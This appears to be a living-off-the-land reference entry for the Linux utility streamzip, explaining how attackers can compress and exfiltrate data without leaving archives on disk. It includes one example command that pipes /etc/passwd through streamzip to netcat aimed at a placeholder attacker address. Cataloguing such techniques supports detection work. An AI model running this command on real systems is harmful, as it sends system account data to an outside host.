streamzip
Created by Gabriel De Jesus (0xv1n)
Description
streamzip is a system utility that can be utilized to compress data from “stdin” and write the data directly to “stdout”, no temporary files are created. The tool can be used by malicious actors to collect and exfiltrate sensitive data without leaving staged data archive artifacts on disk.
Created | Tactics | Tags |
---|---|---|
2024-07-15 | Collection Exfiltration | files compress |
Paths
/usr/bin/streamzip
Use Cases
Copy and compress sensitive data locally
The following command reads file data and compresses the data for exfiltration
dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT
Detections
- No detection content at time of writing